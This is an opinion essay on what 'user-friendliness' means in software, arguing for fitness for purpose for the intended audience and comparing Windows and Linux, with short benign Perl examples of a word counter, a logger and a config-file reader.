Some history of Windows here and here
Webmasterbase on some GUI history
The Halloween Documents

Document Changes
February 26, 2004: Essential rewrite of article stressing the central idea and new links too.
April 01, 2009: Updates and corrections.

September 11, 2001

User Friendly?

An essay on the concept of User Friendliness

The growth in the use of the personal computer has brought into prominence the very important concept of user-friendliness, a concept that was not much used in the eras preceding this period. In the period since, there has hardly been a term more used and abused for various means and ends. Here we shall try to get a perspective on user-friendliness and ask some strange questions.

Also note that a major focus of this paper is the application of this term to the environments of Linux and Windows.

The early beginnings of the term user-friendly are shrouded in mystery. What is known is that this word alone forms one of the biggest and most successful mantras for some of the biggest software companies around. So what is user-friendliness?

There's a lot of talk about making software more user friendly. Some pieces of software are user friendly, while others are not, right? Well, that seems to be the opinion most people have. A common view seems to be that a program is user friendly if it has a graphical user interface, and otherwise it is not. But this is a very simplistic and short-sighted way of defining user-friendliness. All that graphical systems allow is friendliness, not user-friendliness.

What is the difference? The term "user-friendliness" contains the word "user", which explicitly binds any definition of the term to another variable - the user. It means something friendly to the intended audience, and that is where the buck stops. User-friendly software is software that does not get in the way of the user, not software that can be used without reading a single line of the manual. All user-friendliness requires is fitness for purpose in the most unobtrusive manner possible.

It is not incumbent upon user-friendly software to do the user's work for him. Nor is it incumbent upon it to provide animated paper clips that tear across your screen. User friendliness does not mean blandness of design or lack of options.

One additional point must be taken care of before we accept this definition: the type of audience. Obviously, no user of software comes into this world with all the information about that software built into him. He has a learning curve for every piece of software he uses, just like anything else he learns. The user-friendliness of software can therefore be further split into friendliness towards the newbie user and towards the seasoned user. We shall accordingly describe the user-friendliness of software with respect to the audience as being "newbie friendly" or "seasoned friendly".

We have in place a set of rules and guidelines, and of course a formal definition of the term user-friendliness. We shall use these tools to examine and understand some of the present concepts of user-friendliness that are prevalent in the community. We shall then proceed from that analysis to examine more important questions.

A few examples before we go on. Emacs is just another text editor - for a newbie. But any user of Emacs who has learnt the keystrokes will swear by Emacs till death. Emacs is therefore user-friendly, as it does indeed make itself fit for purpose and does it well; it is more seasoned friendly. Take the MS-Paint program as another example. Almost every user has used it when taking his first faltering steps with the mouse. This program is very simple and intuitive to use: a simple, straightforward application for a simple, straightforward use. We may argue about the purpose for which it claims fitness, but the point is that this program is classic newbie friendly. I am aware of the bias in choosing these examples, but they are only for the purpose of illustration, and no inferences are to be drawn right now.


The present concept of user-friendliness

There are a number of misconceptions about user-friendliness. I shall look at a few present-day attributes of software that are due to misapplication and misinterpretation of the concept of user-friendliness.

User friendliness has come to denote the GUI, especially when it comes to comparisons between Windows and Linux: "Linux is less user-friendly" because it does not have a GUI like Windows. While the "fact" itself is arguable, that is not the intent here. The fact of the matter is that Linux, like its Unix predecessors, has a rich set of small and powerful tools that each achieve a particular objective and do so the best way they can. This tends to be rather newbie unfriendly, because of the large number of tools available and the variety of options they provide. But most of the tools that need to run on the command line are precisely those that benefit from the command line. Also, these are tools that are not really meant to be used by a newbie, unless he is actually interested in the tool itself. Finally, most of these tools come with standard help on the command line itself. Going by our earlier strict definition of fitness for purpose for the intended audience, the command-line tools do indeed pass this criterion; they can safely be concluded to be user-friendly. If you find some of these tools difficult or intimidating, consider for a second that they may simply not be meant for you. You probably have another way of doing the same thing that is more friendly towards you.
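
To make the point concrete, here is a minimal sketch (in Perl, and entirely hypothetical - the tool name and behaviour are illustrative, not an existing utility) of the kind of small, focused command-line tool described above: it does one narrow job, takes its input from standard input so it composes with other tools, and carries its own usage help.

#!/usr/bin/perl
# countwords - a hypothetical, minimal Unix-style filter:
# reads text from standard input and prints a word count.
use strict;
use warnings;

# A focused tool carries its own help, right on the command line.
if (@ARGV and $ARGV[0] =~ /^(-h|--help)$/) {
    print "Usage: countwords < file\n";
    print "Counts the words read from standard input.\n";
    exit 0;
}

my $count = 0;
while (my $line = <STDIN>) {
    # split on whitespace; leading empty fields are discarded
    my @words = split ' ', $line;
    $count += @words;
}
print "$count\n";

Because it reads standard input and writes standard output, such a tool chains naturally with other small tools - which is exactly the design defended above.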

Another common view of user-friendliness has been "uniformity": similarity of interface, and similar-looking names, so that users don't take time to adapt to the software. Although this concept is admirable per se, an application of our rules makes us think otherwise. A program is required to be fit for a particular purpose, which means the user interface should be too. Any good interface should be intuitive for the purpose for which it has been built, and once this is done I see no reason for "uniform interfaces" and "ease of getting used to new interfaces". If you cannot make a spreadsheet look like a word processor, the concept of uniformity does not and never did exist. In fact, I will go so far as to say that uniformity of interfaces never really existed; it was a product of the PR team rather than the developers, and in fact reflected the GUI toolkits' inability to make it easy for developers to create new interfaces.

An aside here. The concept of similar interfaces has been abandoned by all the major software developers; the present term is "intuitive" interfaces. The reason is obvious. When a firm spends a lot of money developing software, it would like to make it distinctive and have top-of-mind recall among its customers. The interface is the only way of doing this. Given the constraints that uniformity imposes, the companies have obviously opted out. So not only is the concept misguided, it does not even exist, except in PR department briefs.

User friendliness has come to mean the aggregation and integration of multiple functionalities into single, monolithic, all-powerful programs. This is one of the great myths of personal computing. There has never been a program that is all-encompassing and integrated and at the same time extremely powerful, safe and easy to use. Perceptions of user friendliness have always been at loggerheads over which functionalities to include in a single program. Making a single huge program also means providing a lot of configuration options, which is considered not to be user-friendly. Hence, for any given functionality in an integrated program, there are inevitably ways to do all of it better with smaller, more focused programs. This has indeed spawned a whole industry offering tweaks and hacks for well-known software to extend and increase functionality. Integration is newbie friendly and seasoned unfriendly.

A by-product of user friendliness coupled with the closed software model has been a stress on hiding the internals of the software from the user. This is ostensibly to protect the user from the program, and to make sure that he is not intimidated by the software in any way. In fact it is more to hide the shoddy work of the programmer, hide all flaws under the hood, keep the user uninformed and keep that poor idiot permanently dependent on the service department and new product updates.

One really absurd interpretation of user friendliness is the lack of information on what the program is doing at any given time. It is considered better for the program to apparently freeze up than to report what it is trying to accomplish. On the contrary, what user-friendly software should do is keep the user informed about what it is doing. Normally the user will ignore all that information, but it becomes absolutely invaluable in times of error: any such information is very useful in diagnosing faults and for first aid. With programs denying the user such knowledge, he is bound to support and service for salvation.

One final measure of user friendliness is the lack of information about how the program works. Modern OSes provide a number of ways of achieving the same objective. The absolute lack of technical information in the help, and the limiting of help files to "click here" information, is hardly friendly. It may be argued that such information is not newbie friendly. That depends on the capabilities of the newbie, really, and on what is achieved by not including it at all. A real I-don't-care-a-damn newbie will never look into it anyway, even if it were included. But not including it actually makes the program unfriendly, as it takes away crucial information about the fitness for purpose of the software.


Evaluation of the need

Ask any layman who uses computers what he believes to be the most important requirement of a computer system. More often than not he will come up with the clichéd user-friendliness. But should it be? In other words, why should computer systems be user friendly?

This may seem blasphemy to all, but hear me out. The fashionable thing to do today is to make things user friendly. This has, on one hand, led to the development of click-and-do interfaces. It has also, on the other hand, led to the excommunication of geek-speak from the products of computer science. I need to dwell upon this for a little perspective on the path my reasoning is going to follow.

Throughout man's history we have seen a number of sciences grow and develop. Without fail, each science has developed its own language. Practitioners say it allows easy and quick communication; sceptics say it is to protect the practitioners of the science from the laymen. No matter what the reason, the fact remains that this particular stream, computer science, is being denied the use of its own language in its own products.

The point is simple. Computer science is just another stream of science. Practicing it needs the same amount of learning and preparation as any other stream of science. The fact that it has the ability to reach the masses should not take away from the respect that any other branch of engineering gets. Its ease of use should not be held against it.

To take complete advantage of this argument it is necessary, as in any other branch of engineering, to identify the various components of the user populace. We shall split the user populace into two categories. The first we shall call the "dummies", after the famous set of user manuals that flooded the market. These are users who are concerned not with the product itself, but only with what it does for them. These users are the ones who should be given the whole "ease of use" benefit. The titles these users use are primarily end-user software: word processors, spreadsheets, multimedia applications, browsers and P2P applications. This also includes the large body of applications for other fields of study: all software used for data processing by members of other branches of science, engineering and even art comes into this category. This therefore forms not only the biggest segment, but also the one most elastic and responsive to the user-friendliness of software.

Contrary to common perception, this will also be the toughest segment to program for. Instead of the sorry software that is sold to this segment today, there should be more real user-friendliness built in. The software needs a lot of improvement, which actually means not following the present norms. The following is a set of guidelines for the kind of software that is expected to meet the needs of the dummies.

  • Software must be focused, and accomplish more with little effort, especially when it comes to engineering applications
  • The software must make things transparent to the user, as far as the actual implementation of the various options in the program goes. It is neither necessary nor desirable for the software to prevent the user from doing things differently, in a way he desires.
  • The software must keep the user in the loop, communicating with the user through visual and audio signals denoting the function being performed. The signals should be subtle enough to ignore. For example, the status bar is a great place to give a lot of information on what the program is doing (see the sketch after this list).
  • While it may be required to keep the initial configuration of the program simple, no attempt must be made to reduce the option set available to the user. Advanced configuration options are a must.
  • Rather than keep the interface standard, stress should be on keeping the interface simple, uncluttered and intuitive.
  • Documentation is important. Just like it is desirable to keep the configuration simple, without reducing the available options, advanced information and advanced implementation should be discussed. Any issues that may be faced by the users must be documented. If a known bug exists, it should be listed. Any warnings to the user must be explicit and easy to understand.
  • The user must forever be in control of his own machine. Rather than annoying "OK" pop-ups, it is more desirable to provide logs, keep track of changes performed, and give the advanced user the power to see and undo any changes made to the system.
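
As a rough illustration of the "keep the user in the loop" and "provide logs" guidelines above, here is a minimal Perl sketch (hypothetical; the file names and messages are only illustrative). Status messages are subtle and ignorable, but everything is also appended to a log the user can consult when something goes wrong.

#!/usr/bin/perl
# A hypothetical sketch: report progress unobtrusively and keep a log.
use strict;
use warnings;

# The log file name is illustrative only.
open(my $log, '>>', 'myapp.log') or die "Cannot open log: $!";

# status(): one short line the user can ignore, plus a timestamped log entry.
sub status {
    my ($msg) = @_;
    print STDERR "[myapp] $msg\n";               # subtle, ignorable status line
    print {$log} scalar(localtime), " $msg\n";   # permanent record for diagnosis
}

status("Starting up");
status("Saving settings to settings.conf");      # example action, name illustrative
# ... the real work would happen here ...
status("Done");

close($log);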

Then we have the "power-users". These are users who are either directly related to the branch of computer science, or are well versed in the usage of software. The kind of software this segment will be using is high-end, server-level software: web servers, SQL servers and the like. It will also include those from the dummies who have gained insight into the working of their own software and are willing to experiment and learn more. This is a set of guidelines for this kind of software.

  • These users are not newbies and should not be assumed to be the lowest rung of the user populace. The interfaces should be designed using common configuration themes
  • Administration should necessarily be centralized and be powerful and flexible.
  • Information should never be hidden from these users. Configuration options should never be limited to a few option sheets; it is strongly advised to follow the configuration-file method of setting options (a minimal sketch follows after this list). The administration console may be a front end for a limited set of options. If the console can list all the options, so much the better, but none should be dropped for lack of space.
  • Alternative methods for the same task may be provided, but no attempt should be made to hide the choice from the user. The user should have the power to choose.
  • Documentation should be complete, easily accessible and also include relevant technical and implementation information.
  • Log files are a necessity and so are front end analyzers for those log files
  • The administrator should forever be in control of the machine, under all circumstances
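
A minimal sketch of the configuration-file approach recommended above (hypothetical; the file name, keys and defaults are purely illustrative). Every option lives in a plain-text file the administrator can read and edit; a graphical console could sit in front of this, but nothing is lost if it only exposes a subset.

#!/usr/bin/perl
# Hypothetical sketch: read simple "key = value" options from a config file.
use strict;
use warnings;

my $conf_file = 'server.conf';      # illustrative name
my %options = (
    port      => 8080,              # sensible defaults, overridable in the file
    log_level => 'info',
);

if (open(my $fh, '<', $conf_file)) {
    while (my $line = <$fh>) {
        next if $line =~ /^\s*(#|$)/;               # skip comments and blank lines
        if ($line =~ /^\s*(\w+)\s*=\s*(.*?)\s*$/) {
            $options{$1} = $2;                      # every option is visible and editable
        }
    }
    close($fh);
}

print "Using port $options{port}, log level $options{log_level}\n";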

Having defined what we expect from the software, we shall answer the first question: why should computer systems be user friendly?

The only reason computer systems should be user-friendly is to perform their intended function, for the intended audience. Truly user-friendly programs are written by correctly identifying the intended audience and the intended function, in equal proportion. No software can be called user-friendly if it chooses to ignore either of these two aspects. No concept of friendliness makes sense without both these variables defined; user-friendliness does not exist in a vacuum.


Windows and Linux

Based on the discussion above, how do Linux and Windows measure up as working environments? We shall look at the two environments - one supposedly user friendly, the other user unfriendly - dispel some myths, and then evaluate their positions.

Windows enjoys the position of power in the personal computer segment. This is to a great extent due to its early-mover advantage; the perception that Windows is user-friendly also had a very important role in it. But how did Windows approach user-friendliness? And is this approach justified?

Windows assumed all of its users to be a bunch of morons. To give credit, it assumed that its users are people who do not want to spend any time at all trying to know the system they are using. This may be true to an extent, but it sure is a flawed assumption. Although Microsoft has become the biggest player in the PC segment, it has certainly lost out in more advanced markets like, say, the server segment.

Microsoft, through Windows, has been highly user focused. All of its decisions have been end-user focused, and this end user has been the common man, one who does not want to learn about the tools he uses. This is brilliant as marketing strategy, but bad strategy for building software. They say the problem with Apple was that it hired engineers to do the marketing; the problem with Microsoft has been that it hired marketing guys to do the development. That, in a few words, is it. That is the reason for a decent user interface, but no intuitive layout and pathetic functionality. In its desperation for user acceptance it forgot that software is defined by its functionality as well. So we have software that conforms highly to the standards it set for user-friendliness, while the functionality has been sacrificed. It is possible to dismiss this as a rant, but a quick look at the reasons for Microsoft bashing does suggest as much.

Microsoft's focus has also been on the simplicity of interface that all its products are known for. So what does Microsoft gain by this? By making a simple, uniform interface, it prevents product differentiation. It prevents people from differentiating between competing products, handing the choice of those products back to the developer of the OS itself - that is, Microsoft.

So is this software user-friendly? According to our definition it is not; it is flawed. The software may be newbie friendly, but it is certainly not complete user-friendly software, because it does not give the function of the software enough say in deciding the design of the software itself.

What about Linux? It can be viewed as two things: first, Linux with its Unix roots, as a server operating system; and then in its new avatar as a desktop alternative.

Unix has been the most powerful and widely used OS of the past. It is incredibly stable and powerful, as many testimonies will prove. But it had absolutely nothing to show for user friendliness: to use Unix one had to climb a vast learning curve. This obviously gave it very low newbie friendliness. On the other hand, it had a lot to show for friendliness in its focus on functionality and power of use.

But things are changing. Linux has a new focus now: the desktop user, and under this focus it has developed a number of things. Linux has powerful and easy-to-use window managers. It has graphical front ends for all the products a simple user wants. It also has easy-to-use products for all kinds of users. Products described as notoriously difficult are actually intuitive, and come with a tremendous amount of documentation.

Linux is special in that it has products for all levels of users. And it has no barricades against getting more information yourself; information is the most important thing in a Linux system. The supposedly cryptic commands are not for everyday users, so how can one use them to dismiss Linux as a desktop alternative? Linux is more than a desktop alternative alone; it is a server OS that can be friendlier than a desktop OS.

So is Linux user-friendly? Not really. It does lack many of the easy-to-use interfaces, and it sure is newbie unfriendly. But the point to note is the focus: it is not on just the program or just the user, it is on both. Hence, in the long run, it is Linux alone that can produce truly user-friendly programs. If I were a punter, I would put my money on the Linux horse. It may be slow now, but it will only get faster.

Document Changes
September 11, 2001: Initial publishing of the article.
April 02, 2009: Spell check and cosmetic changes.